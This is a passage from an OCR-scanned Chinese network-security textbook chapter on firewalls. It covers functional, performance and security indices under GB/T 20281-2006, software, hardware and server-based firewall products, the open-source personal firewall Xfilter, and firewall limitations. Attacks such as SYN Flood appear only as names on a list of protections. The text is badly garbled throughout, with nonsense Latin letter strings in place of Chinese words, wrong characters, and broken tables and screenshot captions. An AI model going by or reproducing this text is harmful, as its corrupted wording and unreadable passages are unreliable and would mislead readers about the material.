好 ,但 是 它 的 代价 很 蜗 , 不 多 配置 ,增加 了 堡垒 主机 转发 数据 的 复 洒 性 ,同时 ,网 络 的 访问 速 
度 也 要 减 慢 ,而 且 , 其 费用 也 明显 高 于 以 上 几 种 防火 墙 。 


13.4  Bjaii EUN AS 
1. 防火 墙 主要 功能 指标 


防火 墙 主要 有 以 下 几 个 功能 指标 。 
(D LAN 接口 。 文 持 的 LAN 接口 类 型 防火 墙 所 能 保护 的 网 络 类 型 ,如 以 太 网 、 快 速 以 
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太 网 等 ; 文 持 的 最 大 LAN 接口 数 指 防 火场 所 文 持 的 局 域 网 络 接口 数目 ,也 是 其 所 能 保护 的 
不 同 内 网 数目 ; 服务 需 平 人 台 防火 墙 所 运行 的 操作 系统 平台 ,如 Linux, UNIX 等 。 

(2) 协议 支持 。 支 持 的 非 IP 协议 除 支持 IP 协议 外 ,还 支持 AppleTalk, DECnet, IPX 
及 NETBEUI 等 协议 ; 建立 VPN 通道 的 协议 ; 可 以 在 VPN 通道 中 使 用 的 协议 。 

(3) lE BR. LFF VPN 加 密 标 准 ; 除了 VPN 外 ,还 加 密 的 其 他 用 途 ; 提供 基于 
人 硬件 的 加 密 。 

(4) TAGES HR. SC RAN UA GES Ys 列 出 支持 的 认证 标准 和 CA 互 操作 性 ; 支持 数字 
ub. 

(5) 访问 控制 。 通 过 防火 墙 的 包 内 容 设置 ; 在 应 用 层 提 供 代 理 文 持 ; 在 传输 层 提 供 代 
理 支持 ; 允许 FTP 命令 防止 某 些 类 型 文件 通过 防火 墙 ; 用 户 操作 的 代理 类 型 ; 支持 网 络 地 
址 转换 (NAT); 文 持 便 件 口令 ARER., 

(6) 防御 功能 。 文 持 病 毒 扫 摘 ; 提供 内 容 过 滤 ; 能 防御 的 DoS 攻击 类 型 ; 
ActiveX,Java,Cookies,J avaScript f A, 

(7) 安全 特性 。 支 持 转发 和 跟踪 ICMP 协议 (ICMP 代理 ); 提供 入 侵 实 时 
实时 人 侵 防 范 ; 识别 /记录 /防止 企图 进行 IP 地 址 欺骗。 

(8) 管理 功能 。 集 中 管理 多 个 防火 墙 ; 提供 基于 时 间 的 访问 控制 ; SER SNMP 监视 和 
配置 ; 本 地 管理 远程 管理 ; Sc pri wA ME, 负载 均衡 特性 ; 失败 恢复 特性 。 

(9) 记录 和 报表 功能 。 防 火 墙 处 理 完整 日 志 的 方法 ; 提供 自动 日 志 扫 描 ; 提供 自动 报 
RASREBS A; 警告 通知 机 制 ; 提供 简要 报表 (按照 用 户 ID s IP 地 址 ); 提供 实时 统 
ib: 列 出 获得 的 国内 有 关 部 门 许可 证 类 别 及 号 人 码 。 

2. 防火 墙 性 能 指标 

《信息 安全 技术 防火 墙 技 术 要 求 和 测试 评价 方法 GB/T 20281 一 2006) 中 对 防火 墙 产 
品 应 达到 的 性 能 指标 作出 了 规定 。 

CD rubi: 防火 墙 在 不 于 包 的 情况 下 转发 数据 的 能 力 ,一般 用 所 能 达到 的 线 速 的 百 
分 比 ( 或 称 通 过 速率 ) 来 表示 。 测 试 方法 如 下 。 

CD 配置 测试 防火 墙 只 有 一 条 默认 人 允许 规则 。 

2) 进行 UDP Mi] Zr nt st jl 1x, 

© 配置 防火 墙 在 200 条 以 上 不 同 访问 控制 规则 。 

GD 进行 UDP Wil AIEE Wit. 

(2) 延迟 ; ZA s Mol HY tie Jes — 1 AY AR Fé ads 90] DJ 3 P b Ped A Ha A m O E iC s a HJ BS — 1 
的 首部 到 达 防 火 墙 外 部 网 络 输 出 端口 之 间 的 时 间 间 隔 。 测 试 方法 如 下 。 

CD 配置 测试 防火 墙 只 有 一 条 默认 人 允许 规则 。 

O 取 和 吞吐 量 测试 中 测 得 的 最 大 吞吐 量 ,进行 延迟 测试 。 

© 配置 防火 墙 在 200 条 以 上 不 同 访问 控制 规则 。 

O 取 吞 吐 量 测试 中 测 得 的 最 大 吞吐 量 ,进行 延迟 测试 。 

(3) 最 大 并 发 连接 数 : 防火 墙 所 能 保持 的 最 大 TCP 并 发 连接 数量 。 它 表示 防火 墙 对 其 
业务 信息 流 的 处 理 能 力 , 反 映 出 防火 墙 对 多 个 连接 的 访问 控制 能 力 和 连接 状态 跟踪 能 力 ,这 
个 参数 的 大 小 了 下 接 影响 到 防火 墙 所 能 文 持 的 最 大 信息 点 数 。 测 试 方法 如 下 。 

D 配置 防火 墙 允 许 某 种 TCP 连接 ， 
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O 通过 专用 性 能 测试 设备 测试 防火 墙 所 能 维持 的 TCP 最 大 并 发 连接 数 。 

(4) 最 大 连接 速率 : 防火 墙 在 单位 时 间 内 所 能 建立 的 最 大 TCP 连接 数 ,一般 是 每 秒 的 
连接 数 。 这 个 指标 主要 体现 了 被 测 防火 墙 对 于 连接 请 求 的 实时 反应 能 力 。 测 试 方法 如 下 。 

CD 配置 防火 墙 允许 某 种 TCP 连接 。 

C) 通过 专用 性 能 测试 设备 测试 防火 墙 的 TCP 连接 速率 。 

3. 防火 墙 安全 指标 

结合 相关 标准 的 要 求 和 安全 功能 需求 ,分 别 从 安全 审计 、 攻 击 防护 和 访问 控制 3 个 方面 
audet eith 

(1) 安 全 审计 指标 。 安 全 审计 指标 包括 审计 日 记 格 式 完备 性 及 审计 记录 的 完整 性 要 求 。 
根据 相关 标准 要 求 ee 事件 的 日 期 和 时 间 主体 信息 .客体 信息 .事件 类 型 
和 事件 是 否 成 功 ; 审计 内 容 应 该 包括 重要 用 户 行 为 .重要 系统 命令 的 使 用 及 系统 资源 的 弄 
党 使 用 等 安全 事件 。 因 此 ,对 于 安全 审计 来 说 ,防火 墙 审 计 日 志 应 该 记录 日 志 关 联 的 日 期 、 
时 间 JE IP 地 址 \ 源 端口 .目标 IP 地 址 .目标 端口 .协议 类 型 .事件 类 型 和 事件 结 朱 等 ,同时 
事件 类 型 应 包括 配置 日 志 、 操 作 日 志 及 流量 日 志 等 ,全 面 记 录 防 火 墙 的 配置 和 运行 情况 。 针 
对 这 些 要 求 ,形成 安全 审计 指标 (CA) ,如 对 于 审计 日 志 的 源 TP. 地 址 要 求 ,指标 标识 idc 唯一 
确定 ,指标 名 name 为 “Source-IP”, 指标 类 别 class 为 “Security-Audit”, 即 可 表示 为 CCidc， 
"Source-IP" ,"Security- Audit") 。 

(2) 攻击 防护 指标 。 针 对 主要 的 网 络 攻 击 行 为 , 即 拒绝 服务 攻击 、 信 息 收 集 型 攻击 等 ， 
防火 墙 应 该 具有 一 定 的 防护 能 力 ,减轻 这 些 攻击 行为 对 于 网 络 造成 的 影响 ,保证 网 络 的 合理 
利用 。 管 见 的 网 络 攻 击 有 以 下 几 种 。 

CD 拒绝 服务 攻击 : Ping of Death, UDP Flood, SYN Flood, ICMP 洪水 攻击 、IP 碎片 攻 
击 、Land 攻击 、Tear-drop Mit Smurf 攻击 等 。 

@ 信息 收集 型 攻击 : IP 地 址 扫描 技术 、 端 口 扫 描 攻 击 、IP 地 址 欺骗 攻击 。 

针对 上 述 主 要 的 网 络 攻击 ,分 别 形成 对 应 的 攻击 防护 指标 CD, 如 对 于 IP 地址 扫描 防护 
指标 ,指标 标识 idc 唯一 确定 ,指标 名 name 为 "Address-Sweep-Attack”, 指 标 类 别 class 为 
“Attack-Defend”, 指标 存 在 即 表 示 需 要 实施 该 攻击 防护 措施 , 即 可 表示 为 CCidc,"Address- 
Sweep-Attack" ," Attack-Defend") 。 

(3) 访问 控制 指标 。 防 火场 的 核心 作用 在 于 将 内 部 网 络 和 外 部 网 络 隅 离 ,执行 访问 控 
制 荣 上 略 ,限制 内 网 用 户 访 问 外 部 网 络 及 外 部 未 授权 用 户 访 问 内 部 网 络 。 

访问 控制 涉及 主体 、 客 体 及 动作 三 要 系 , 对 于 防火 墙 而 言 ,主体 为 源 地 址 、 源 端口 ,客体 
为 目的 地 址 .目的 端口 ,因此 可 以 根据 源 地 址 、 源 端口 .目的 地 址 .目的 交口 及 访问 的 协议 类 

型 这 5 个 域 , 确 定 是 否 人 允许 网 络 访问 通过 ,限制 进出 防火 场 的 访问 。 即 访问 控制 指标 CC 需 
要 确定 src ip.src port,dst ip,dst port,prcl 和 action ,其 中 src ip 和 dst ip 可 以 采用 前 绥 
aK yu Fal eo , 均 表 示 一 段 IP 地 址 ; src. port 和 dst. port X m O = ,. WA yù EIX Lo. 65535]. 
可 以 为 单个 人 或 一 段 闯 口 集合 ; prd PAREA N {TCP.UDP.ICMP,IP.IGMP}; 指标 标识 
idc 唯一 确定 ,name 为 “Policy-Rule”, 类 别 class 为 "Access-Control”, 即 可 表示 为 CCidc， 
"Policy-Rule" ，Access-Control . null. 192. 168. 1. 100, 80, 222. 10. 56. 137. 8000, TCP, 
Accept) , 
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13.5 防火墙 产品 类 型 局限 性 与 发 展 


13.5.1 防火 墙 产品 分 类 

目前 ,防火 场 产品 大 致 分 为 软件 防火 墙 、 人 硬件 防火 场 和 工业 标准 服务 融 形 式 的 防火 均 三 类 。 

1. RAR Ale 

软件 防火 场 一 般 运 行 在 操作 系统 以 上 ,下 面 以 Checkpoint Fire wall/NAI Gauntlet 产 
品 为 例 分 别 介 绍 。 

(1) Checkpoint Fire wall 的 主要 特点 如 下 。 

Fire Wall-l 防火 墙 能 够 在 用 户 区 域内 使 用 X. 509 标准 作为 密 钥 交换 协议 ,并 提供 支持 
Entrust 的 数位 证 明 解 决 方 案 。 该 防火 场 同 时 文 持 LDAP 目录 管理 功能 ,能 够 帮助 用 户 设 
BAT ZW a RM 

Fire Wall-l 为 用 户 提 供 了 多 种 安全 的 认证 机 制 , 这 些 机 制 使 得 用 户 在 获取 用 户 区 域内 
的 服务 资源 前 ,能 够 得 到 元 分 的 安全 性 确认 ,而 不 需要 对 本 地 客户 端的 应 用 程序 进行 专门 的 
修改 。 这 些 认 证 服务 可 以 被 集成 到 用 户 区 域 的 整体 安全 开 略 中 ,并 借 由 Fire Wall-l 的 图 形 
界面 进行 统一 管理 。 所 有 的 认证 服务 都 可 以 经 由 Fire Wall-l 的 日 志 进 行 监控 和 跟踪 。 
Fire Wall-l 为 用 户 提 供 了 3 种 基本 认证 方法 : 用 户 认证 提供 了 以 用 户 为 基础 的 多 种 协议 下 
的 访问 权限 控制 ,与 用 户 访问 的 IP 地 址 无 天; 客户 闹 认 证 能 够 限制 特定 IP 的 特定 用 户 的 
访问 权限 ,并 由 管理 员 设 置 其 权限 ; 会 话 认 证 可 以 对 任何 一 种 基于 会 话 的 服务 进行 认证 。 
目前 ,Fire Wall-l 文 持 的 平台 包括 微软 公司 的 Windows 系列 操作 系统 、Sun 公司 的 Solaris 
操作 系统 、IBM 公司 的 AIX 操作 系统 等 主流 的 服务 磊 及 果 面 操作 系统 。 

(2) NAI Ganutlet 的 主要 特点 如 下 。 

NAI Ganutlet 作为 基于 应 用 层 网 关 的 防火 墙 ,集合 了 NT 的 强大 性 能 和 多 用 性 ,在 应 
用 层 中 按照 安全 果 略 配置 过 滤 双 回 通信 数据 ,具有 融 透 明 .高 集成 、 高 和 吐 、 踢 加 蜜 的 特点 ， 
可 应 用 在 互联 网 网 天、 企业 内 部 网 关 及 虚拟 网 天 中。Gauntlet 防火 场 拥 有 和 侧 单 易 用 的 管理 
界面 ,可 通过 互联 网 在 浏 览 闪 中 进行 远程 配置 和 管理 ,并 可 以 从 其 管理 界面 中 对 网 络 内 部 进 
行 监控 。 同 时 ,Gauntlet 还 允许 用 户 通 过 网 络 管理 和 访问 SNMP 设备 ,也 同时 支持 多 种 多 
VU MX 。 

NAI Gauntlet 支持 多 种 常见 的 标准 协议 ,如 FTP,HTTP,SNMP, LDAP, PPTP 等 。 

2. 硬件 防火 墙 

Net Screen 公司 的 Net Screen 防火 场 产 品 是 一 种 便 件 防火 场 ,Net Screen 产品 完全 基 
于 人 硬件 ASLC SR , 它 就 像 一 个 盒子 一 样 , 安 疫 使 用 起 来 很 简单 。 同 时 它 还 是 一 种 集 防 火 
ti. VPN ,流量 控制 3 种 性 能 于 一 体 的 网 络 产 品 。 应 用 场合 如 下 。 

(1) Net Screen 10 适用 于 10Mbps 以 太 网 。 

(2) Net Screen 100 适用 于 10Mbps 以 太 网 。 

(3) Net Screen 1000 则 可 以 文 持 干 兆 以 太 网 ,适应 不 同 场合 的 需要 。 

fi PF Ji y SE SET EU F., 


210 


到 络 攻防 原理 及 应 用 


Net Screen 将 防火 场 `\VPN ,和 市 接 入 ,访问 流量 控制 等 功能 集成 到 一 个 ASLC ith Hr 
中 ,在 提供 最 高 级 别 的 IPSec 标准 的 同时 ,降低 了 数据 加 密 锁 市 来 的 性 能 瓶颈 。 由 于 采用 了 
新 的 结构 ,因此 任何 一 台 计 算 机 都 可 以 通过 浏览 闫 对 Net Screen 进行 配置 。 

3. 工业 标准 服务 器 防火 墙 

工业 标准 服务 兹 防火 墙 ,是 指 凡是 符合 工业 标准 的 、 大 批量 生产 的 、 机 染 式 服务 兹 ,无 论 
是 LA 染 构 的 ,还 是 类 似 IBM 的 ISA 如 构 的 ,只 要 符合 上 述 标准 都 可 以 称 为 标准 服务 融 。 
因此 ,在 这 种 平台 上 安 疙 ,运行 防火 墙 软件 形成 的 防火 墙 系 统 ,部 可 以 称 为 工业 标准 服务 前 
Bj; k Hi . 

Mos HE HC Fit WX Set FH PE BE DT rr EG AE 36 tea» MA rf S£ 2 HH P a il , EESMAA A F 
7N Fo 

) 速度 快 性 能 高 

防火 墙 的 性 能 取决 于 两 个 方面 : 软件 和 人 硬件。 工业 标准 服务 硕 , 由 于 生产 的 批量 大 , 产 
品 更 新 换代 快 , 因 此 总 能 保证 使 用 最 新 的 技术 和 人 硬件 ,如 最 快 的 CPU 内存 ,更 大 容量 的 便 
AX Beet WY AG a SE , MA T A Ba Sher BA) HE RE GE ma He t T BY Ob ARE 

Ii EE AR FE RE VE BE HY ME — TL 28, Ba han Be EY TE AS RR PY BE Ee ES 
算 机 网 络 升 级 (从 10Mbps 到 100Mbps. KM 100Mbps 到 1000Mbps, 10000Mbps) ,因为 即使 
便 件 满足 了 需求 ,软件 也 处 理 不 了 如 此 大 的 数据 量 。 目 前 世界 上 数据 吞吐 率 最 高 的 防火 均 
Jub Nortel 平台 上 的 Check Point NG 7“ "nm. mid 3. 2Gbps。 

2) 批量 大 、 价 格 低 

工业 标准 服务 天 的 生产 批量 非常 大 ,所 以 单位 成 本 较 低 。 因 此 ,这 种 形式 的 防火 场 可 以 
为 用 户 提 供 具 有 高 性 能 价格 比 的 网 络 安全 解决 方案 。 相 对 于 便 件 防火 墙 , 无 论 在 产品 的 安 
全 性 上 ,还 是 在 价格 上 ,工业 标准 服务 融 形 式 的 防火 墙 ,都 具有 很 大 的 优势。 

工业 标准 服务 天 与 软件 防火 墙 PF K HTE ECE EE .性 能、 管理 .维护 费用 .扩展 
性 .配置 灵活 性 、 价 格 等 方面 的 对 照 如 表 13-1 所 示 。 


X 13-1 软件 防火 墙 硬 件 防火 墙 和 工业 标准 服务 器 防火 墙 对 照 表 


Hx A PF Bj K Seat hie PF jg cds 工业 标准 服务 器 防火 墙 


ze ns 
安全 全 T 
tit A 
v T 
维护 旨 用 E 
ree | à | e | a 
vease |a ë | e | a 
m TT: 


3) 工业 标准 服务 器 的 特点 

防火 墙 必须 保证 7X24 小 时 不 间断 地 运行 ,以 保护 网 络 资源 ,避免 未 经 授权 的 访问 。 
方面 ,防火 墙 软件 应 提供 热 备 份 的 功能 ,包括 网 关 之 间 和 管理 服务 器 之 间 的 高 可 用 性 ,以 避 
免 单 点 故障 的 发 生 ; 男 一 方面 ,作为 防火 墙 载体 的 人 硬件 设 备 ,也 应 提供 可 徘 的 性 能 你 障 , 因 
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为 它 是 防火 墙 的 基础 。 工 业 标 准 服 务 器 具有 以 下 特点 。 

CD 使 用 服务 需 级 别 的 主板 及 专用 的 世 片 组 。 

© 使 用 具有 纠 错 功 能 的 ECC 内 存 , 可 消除 数据 噪声 市 来 的 不 稳定 因素 。 

© 使 用 RAID 技术 提高 磁盘 访问 性 能 及 其 可 靠 性 。 

O 采用 通过 认证 的 软 人 硬件 ,保证 良好 的 系统 兼容 性 ,确保 整个 系统 的 稳定 性 。 

© 对 易 出 现 故 隐 的 部 件 采 用 元 余 及 热 插 拔 ,减少 因 人 硬件 故障 导致 的 服务 仿 止 。 

© 将 服务 硕 管 理 世 片 集 成 在 主板 上 ,包含 了 丰富 的 服务 需 管 理 功能 ; 能 够 提供 主动 监 
控 、 报 警 及 远程 管理 功能 。 

4) 维护 费用 低 .扩展 性 好 

一 些 用 户 喜 欢 便 件 防火 才 ,很 大 一 部 分 原因 是 由 于 它 节 省 空间 ,可 以 直接 安 半 在 机 架 上 。 
现在 ,工业 标准 服务 器 形式 的 防火 墙 同样 可 以 提供 IU、2U 等 标准 尺寸 ,可 以 使 用 户 在 有 限 的 
空间 里 放置 最 大 数量 的 设备 ,多 于 管理 和 维护 ,同时 它 的 配置 更 加 灵活 ,适应 范 围 也 更 宽广 。 

工业 标准 服务 融 广 商 一 般 都 提供 集中 化 的 管理 工具 ,使 管理 员 可 以 从 一 个 控制 台 访 问 
PA IRS #5 EP IRS ARIE RIS Ts 另外 ,用 户 可 通过 LED 1878 £T Dos N 95 Ht 25 ARK 
侠 , 迅 速 得 知 出 故障 的 机 需 方 位 ,从 而 实现 快速 预 辕 。 免 工具 机 箱 设计 ,使 管理 人 员 不 需要 
信 助 工具 就 可 以 打开 机 箱 , 拆 邓 任 何 可 以 拆 凶 的 部 件 , 从 而 实现 了 快速 升级 和 部 件 更 换 ; 同 
时 ,由 于 所 有 部 件 均 采用 工业 标准 ,因此 价格 低 、 数 量 足 ,更 换 起 来 方便 快捷 ; 由 于 基于 工业 
标准 服务 需 的 防火 墙 系统 扩充 性 能 好 ,可 以 随时 根据 需求 ,对 人 硬件 平台 (CPU 内存、 硬盘 
等 ) 及 操作 系统 和 防火 墙 软件 版 进行 升级 ,从 而 保护 了 用 户 的 前 期 投资 。 

5) 配置 灵活 ,集成 不 同 应 用 

用 户 是 产品 最 终 的 使 用 者 ,他们 的 操作 意愿 和 对 系统 的 熟悉 程度 是 厂商 必须 考虑 的 问 
题 。 所 以 一 个 好 的 防火 墙 不 但 本 号 要 有 良好 的 执行 效率 ,也 应 该 提供 多 平台 的 执行 方式 给 
用 户 选 择 。 因 为 如 果 用 户 不 了 解 如 何 正确 地 管理 一 种 系统 ,就 不 可 能 保护 系统 的 安全 。 便 
件 防 火场 甩 用 专 有 操作 系统 ,需要 用 户 来 适应 产品 。 而 采用 工业 标准 服务 硕 , 用 户 则 有 更 多 
的 选择 机 会 。 用 户 可 以 选择 熟悉 、 吾 爱 的 操作 系统 ,如 Windows NT/2000, Linux 和 UNIX 
等 ,实践 表明 对 一 种 产品 的 熟悉 程度 可 以 提 高 其 安全 性 。 并 且 人 硬件 防火 墙 只 能 实现 单一 功 
能 ,而 及 用 标准 服务 器 的 防火 墙 则 可 以 在 上 面 安装 除 防 火 墙 外 的 不 同 应 用 ,如 VPN 流量 管 
HS, M 3 d vx 5 GE ea OL 

6) 体现 系统 集成 商 的 增 信 作 用 

其 实 , 对 用 户 来 说 ,并 不 十 分 关心 防火 墙 采 用 何 种 形式 ,他 们 只 关心 以 下 问题 ; 防火 墙 
是 否 能 满足 月 己 的 安全 需求 ? 运行 是 否 稳定 可 徘 ? 维护 起 来 是 否 简单 易 行 ?对 系统 集成 商 
来 讲 , 单 纯 销 售 人 硬件 防火 增 , 很 难 体现 增值 作用 ,所 获得 的 利润 较 低 ,同时 也 体现 不 出 目 己 的 
技术 优势 。 而 采用 工业 标准 服务 硕 , 系 统 集 成 商 可 以 在 上 边 安 闻 用 户 熟 悉 的 操作 系统 ,并 对 
它 进 行 加 固 和 优化 ,同时 可 以 在 上 面 安 冯 防火 场 `.VPN 流量 管理 等 软件 ,提供 给 用 户 一 个 
完整 的 网 络 安全 解决 方案 。 这 样 ,一 方面 体现 了 系统 集成 商 的 技术 实力 和 增值 能 力 ,使 其 得 
到 了 更 高 的 利润 ; 另 一 方面 用 户 可 以 得 到 一 站 式 服务 ,减少 了 负担 。 

综 上 所 述 ,软件 防 火 墙 虽然 安全 性 高 、 易 管理 .价格 低 、 配 置 灵 活 , 但 在 性 能 上 对 硬件 依 
赖 程度 较 高 。 虽 然 人 硬件 防 火 墙 性 能 高 ,但 从 投资 角度 来 考虑 ,这 种 实现 安全 功能 的 单一 方式 
限制 了 产品 的 灵活 性 及 升级 底层 硬件 的 能 力 , 不 利于 保护 用 户 的 前 期 投资 。 而 且 便 件 防 火 
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墙 最 大 的 缺陷 在 于 把 企业 用 户 限 制 在 一 家 厂商 完成 其 整个 安全 系统 的 罕 路 上 ,这 与 使 用 模 
块 化 系统 “选择 所 有 最 佳 部 件 ” 的 努力 是 相悖 的 , 即 很 难 把 最 好 的 操作 系统 与 最 好 的 防火 墙 
结合 起 来 ,再 接 人 最 好 的 分 析 检 测 系统 ,并且 将 其 部 普 在 最 可 菲 的 平台 上 ,因为 同一 家 厂商 
不 可 能 在 这 几 个 领域 同时 做 到 最 好 。 


13.5.2 开源 代码 防火 场 


国内 一 个 比较 出 名 的 开源 代码 防火 墙 就 是 Xfilter。 

Xfilter 是 由 “ 费 尔 安 全 实验 室 ” 的 朱 艳 辉 、. 朱 雁 冰 两 兄弟 开发 的 一 个 个 人 防火 才 软 件 。 
它 是 一 个 开源 的 个 人 防火 墙 实现 ,采用 Winsock2 SPI 技术 在 应 用 层 进 行 网 络 数据 的 控制 与 
过 沽 ,是 以 教学 为 目的 而 编 与 的 范例 程序 , 它 在 功能 .性 能 及 实用 性 方面 午 比 具有 商业 价值 
HY YA jj Jc 55 — HE 

由 于 Xfilter 使 用 的 技术 为 Winsock2 SPI 技术 ,而 且 工 作 在 应 用 层 , 这 就 决定 了 Xfilter 
只 能 拦截 应 用 层 的 数据 包 ,对 驱动 层 的 包 则 无 能 为 力 。 

个 人 防火 墙 Xfilter 的 主体 功能 包括 用 户 注册 . 控 管 规则 设置 .封包 监视 .日 志 记 录 和 查 
询 、 系 统 配置 参数 设置 及 封包 过 滤 等 ,具体 介绍 如 下 。 

1. RH PERI 

提供 用 户 注 册 的 输入 界面 ,以 便 用 户 输入 详细 的 个 人 信息 ,然后 通过 Internet 传送 到 网 
站 ,实现 发 布 消 息 、 更 换 E-mail、 更 换 网 站 地 址 、 更 换 网 络 命令 地 址 、 更 换 用 户 注册 地 址 、 更 改 
请 求 网 络 命 令 的 时 间 间 隔 等 配置 功能 。 有 了 用 户 注册 这 个 功能 ,安装 在 用 户 计算 机 上 的 软 
件 就 可 以 实现 更 新 ,或 者 接收 软件 链接 经 更 改 后 的 新 地 址 ,用 户 就 无 须 担 心 突然 找 不 到 软件 
的 服务 网 站 了 。 

2. 控 管 规则 设置 

该 功能 是 个 人 防火 墙 Xfilter 的 重点 功能 ,用 户 的 自 定义 过 滤 规 则 控制 管 理 规则 都 在 
该 模块 实现 。 用 户 可 以 对 应 用 程序 的 访问 采取 “放行 所有 ”询问 ”或 “拒绝 所 有 ”的 设置 ,可 
以 手工 添加 月 己 所 需 的 规则 ,修改 已 定义 的 规则 或 删除 不 再 需要 的 规则 ,如 图 13-10 所 示 ， 
还 可 以 对 其 中 的 IP 地 址 段 .访问 时 间 段 进行 设置 。 








a 应 用 程序 设置 


C 放行 所 有 Ce ims) C 拒绝 所 有 


x 控 管 规 刚 设置 LAGU 7) 删除 D) 


| = | JAE: i D HF LEN I I 
I  3BÜSAFE.EXE RARES 1 HITP/80 D:*PROGRAM FIL 


XXI5] 
$62  360DIAGHOSESC... SS fexta ed 工作 时 间 TCP/D D:APROGRAM FIL 








13-10 个 人 防火 墙 X filter 控 省 规则 界面 
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单 击 * 添 加 ?按钮 ,用户 可 以 对 控 管 规则 进行 具体 详细 的 设置 ,如 图 13-11 Brzn o 


(mi Xfilter 个 人 防火 墙 - BBD 


JAER: [D: \PROGRAM FILES \360\3605AFE\360EHTCALL. E | ix 
pen [Briss If. 
访问 时 间 : > | 任何 时 间 





PEDE: EG zit 


Eig usnm: RARD) o cnin. 
进出 方向 : 
服务 类 型 : 
服务 端口 : 





图 13-11 设置 控 管 规则 


CD 对 于 应 用 程序 的 设置 ,用 户 可 以 从 本 机 上 安装 的 所 有 应 用 程序 中 选择 , 选 出 需要 对 
其 连 网 动作 进行 限制 的 应 用 程序 。 

(2) 对 于 访问 网 络 的 设置 ,用 户 可 以 选择 “所 有 网 络 ”“ 局 域 网 ”“ 受 约束 的 网 络 ”“ 信 任 的 
网 络 ” 及 “上 自 定 义 的 网 络 " 分 别 进行 设置 。 其 中 ,“ 所 有 网 络 ” 和 “局 域 网 ”采用 系统 献 认 的 IP 
地 址 段 ,起 止 IP 分 别 为 ** ”x*” 和 “0.0.0.0”0.0.0.0”, 而 “ 受 约束 的 网 络 ”“ 信 任 的 网 络 ” 
及 “日 定义 的 网 络 ” 部 可 由 用 户 日 己 来 制定 相应 的 IP 起 止 范 围 ,并 且 还 可 以 对 其 进行 沃 加 、 
修改 和 删除 操作 ,如 图 13-12 所 示 。 


网 络 信 D | Cir 02> 
eS quem ^. 
92.168.1.1/ 192 168. 255. 255 





图 13-312 个 人 防火 墙 Xfilter 控 管 规则 网 络 设 置 界面 


(3) 对 于 访问 时 间 的 设置 ,用 户 可 以 选择 “任何 时 间 ”“ 工 作 时 间 ”” 工 作 日 业余 时 间 ”“ 周 
末 ”“ 约 束 时 间 ”“ 信 任 时 间 ” 及 “ 自 定义 时 间 ” 对 应 用 程序 访问 网 络 的 时 间 进 行 一 定 的 限制 ,其 
时 间 按 星期 和 24 小 时 来 设置 ,如 图 13-13 所 示 。 

CA) 对 于 种 制 动作 可 选择 “放行 ”或 “拒绝 ”, 进 出 方 品 可 选择 “双向 ”“ 进 ”或 “出 ”, 此 外 还 
可 对 服务 类 型 及 服务 闪 口 号 进行 设置 ,如 图 13-14 所 示 。 
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星期 与 时 间 


[- 星期 日 |v 星期 一 友 星期 二 v 星期 三 
Iv 星期 四 VESA M 星期 六 


时 间 : 


开始 时 间 | 2:00:00 
结束 时 间 | 8:00:00 








13-13 个 人 防火 墙 Xfilter 控 管 规则 时 间 设 置 界面 


ea 高 级 设置 : 服务 端口 为 0 表示 所 有 端口 。 


进出 方 向: [i =| 


服务 类 型 : [TCF 


服务 端口: 和 一 一 一 一 一 一 一 一 一 
图 13-14 (ABP AUG Xfilter 控 管 规则 高 级 设置 界面 





3. 封包 监 

根据 用 户 定义 的 控 管 规则 ,个 人 防火 墙 Xfilter 的 封包 监视 模块 能 够 对 所 有 在 控 管 规则 
列表 里 的 应 用 程序 进行 监视 ,并 实时 列 出 应 用 程序 访问 网 络 的 开始 .结束 时 间 ,进出 流量 .协议 
类 型 . 源 目 的 地址 和 端口 号 等 详细 信息 ,便于 用 户 查 看 网 络 的 安全 状况 ,如 图 13-15 Bron 


a | 


e EUN 




















XSTUDIO 取消 应 用 0 


图 13-15 个 人 防火 墙 Xfilter 封包 监视 界面 
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4. 日 志 记 录 和 查询 


将 封包 监控 的 结果 记录 到 日 志文 件 中 ,可 按 开始 \ 结 束 时 间 来 查询 曾经 做 过 相关 限制 的 
数据 封包 信息 ,该 模块 还 提供 清空 查询 列表 和 翻 页 功能 ,如 图 13-16 Brzn . 





封包 监视 ASSA | 控 管 规则 | 系统 设置 | 关于 | 


TI nares 
开始 日 期 /有 时间: ey 3 月 22 日 “||14:34:57 一 结束 日 期 /时 间 : |2013 年 3 月 23 日 7 ][15:15:51—— 


i uS 500 =, 清除 (0) -Zw | 下 一 页 如 [|syH&siBG 





图 13-16 个 人 防火 墙 Xfilter 日 志 查 询 界 面 


5. 系统 配置 参数 设置 

该 模块 可 供用 户 进 行 公共 设置 和 报警 设置 ,公共 设置 包括 记录 日 志 的 文件 大 小 (以 M 为 
单位 )、Windows 司 动 时 是 否 目 动 司 动 Xfilter、Xfilter 局 动 时 是 否 显 示 欢 迎 界 面 ; dE E 
括 拦 截 时 PC 喇叭 是 否 发 出 报 鸭 声音 及 拦截 时 任务 栏 上 的 图 标 是 否 办 烁 ,如 图 13-17 所 示 。 











Iv 记录 日 志 ， 日 志文 件 大 小 为 |5 | me 
[ Windows 启动 时 自动 启动 Xfiltere 
M Xfilter 启动 时 显示 欢迎 者 面 。 


[v 拦截 时 PC 喇叭 家 出 报警 声音 。 
Iv 拦截 时 闪烁 任务 栏 上 的 图 标 。 





图 13-17 个 人 防火 场 Xfilter 系统 设置 界面 





6. 封包 过 滤 
封包 过 滤 功 能 是 个 人 防火 墙 Xfilter 的 核心 功能 , 它 采 用 Xfilter. dll 给 出 设置 工作 模 
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式 和 控 管 规则 的 接口 函数 ,工作 模式 分 为 放行 所有、 拒绝 所 有 和 询问 3 种 ,根据 工作 模式 
和 控 管 规则 对 过 往 封 包 进 行 过 滤 ,将 通过 的 网 络 封包 记录 下 来 并 通知 Xfilter. exe 取 走 
封包 。 


13.5.3 ”防火墙 的 局 限 性 


1. 防火 墙 的 局 限 性 

CL) 访问 流量 必须 经 过 防火 墙 ,对 于 没有 经 过 防火 墙 的 流量 ,防火 墙 并 不 能 够 主动 进行 

(2) 对 于 来 自 防 火 墙 内 部 网 络 的 攻击 和 安全 问题 ,由 于 管理 成 本 和 运行 成 本 等 因素 ,很 
少 有 企业 愿意 对 内 使 用 防火 墙 。 

(3) 防火 墙 配置 不 当 或 错误 可 能 使 得 外 部 风险 不 能 有 效 消 除 。 

(4) 防火 墙 不 能 防止 拥有 防火 墙 配 置 权 限 的 人 进行 的 破坏 或 其 他 形式 的 物理 损坏 。 

(5) 对 于 标准 网 络 协议 中 的 缺陷 ,防火 墙 并 不 能 有 效 地 进行 入 查 ,一 旦 防火 墙 配 置 中 允 
许 了 某 种 协议 ,该 协议 的 缺陷 可 能 导致 防火 墙 出 现 涯 洞 。 

